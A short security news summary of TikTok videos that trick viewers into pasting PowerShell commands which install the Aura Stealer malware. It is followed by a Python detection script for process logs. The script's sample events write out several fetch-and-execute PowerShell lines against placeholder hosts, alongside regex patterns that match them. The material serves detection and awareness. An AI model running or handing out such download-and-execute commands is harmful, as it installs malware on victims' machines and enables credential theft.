Overview
- SANS Internet Storm Center researcher Xavier Mertens flagged viral TikTok videos that instruct viewers to paste PowerShell commands as part of fake activation guides.
- The commands connect to attacker‑controlled servers using patterns like iex (irm …), which download and execute hidden scripts on Windows PCs.
- One delivered payload is a variant of the Aura Stealer information‑stealing malware, often paired with a second component that adapts code to expand access.
- The clips promise free activation of paid tools or services such as Windows, Photoshop, or Netflix, and have accumulated thousands of views.
- Reports note no platform‑wide takedown or public response from TikTok, with experts urging users who ran the commands to change all passwords and run a full security scan.
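
To check whether anyone in an environment ran such a command, process-creation or PowerShell logging can be searched for the download-and-execute shape. The sketch below is an added example, not code from the ISC report; the event tuples, host names and URLs are constructed, and it goes beyond the literal iex (irm …) form to cover the full cmdlet names and the piped variant.

```python
import re

# Cmdlets, aliases and methods that fetch remote content.
FETCH = r"(?:irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)"
# Cmdlet and alias that execute a string as code.
EXEC = r"(?:iex|invoke-expression)"

PATTERNS = [
    # iex (irm <url>): execution wrapping a fetch in the same statement.
    ("exec-wraps-fetch", re.compile(rf"\b{EXEC}\b[^|;]*\b{FETCH}\b", re.I)),
    # irm <url> | iex: fetch output piped into execution.
    ("fetch-piped-to-exec", re.compile(rf"\b{FETCH}\b[^|]*\|\s*{EXEC}\b", re.I)),
]
URL = re.compile(r"https?://[^\s'\")]+", re.I)

# Constructed sample events: (host, command line), as they might be exported
# from process-creation or script-block logs. Not real indicators.
SAMPLE_EVENTS = [
    ("PC-01", 'powershell.exe -NoProfile -Command "iex (irm https://activate.example.test/win)"'),
    ("PC-02", "powershell.exe irm https://cdn.example.test/setup.ps1 | IEX"),
    ("PC-03", "powershell.exe -Command \"Invoke-Expression "
              "((New-Object Net.WebClient).DownloadString('http://files.example.test/a'))\""),
    # Benign: a fetch whose result is only formatted, never executed.
    ("PC-04", 'powershell.exe -Command "Invoke-RestMethod https://api.example.test/status | ConvertTo-Json"'),
    # Benign: a local script run from disk.
    ("PC-05", "powershell.exe -File C:\\Scripts\\backup.ps1"),
]


def scan(events):
    """Return one finding per event whose command line fetches and executes remote code."""
    findings = []
    for host, cmdline in events:
        for rule, pattern in PATTERNS:
            if pattern.search(cmdline):
                url = URL.search(cmdline)
                findings.append({"host": host, "rule": rule,
                                 "url": url.group(0) if url else None})
                break  # one finding per event is enough for triage
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

A hit identifies the host to triage and the URL to block; it does not by itself show which payload was delivered.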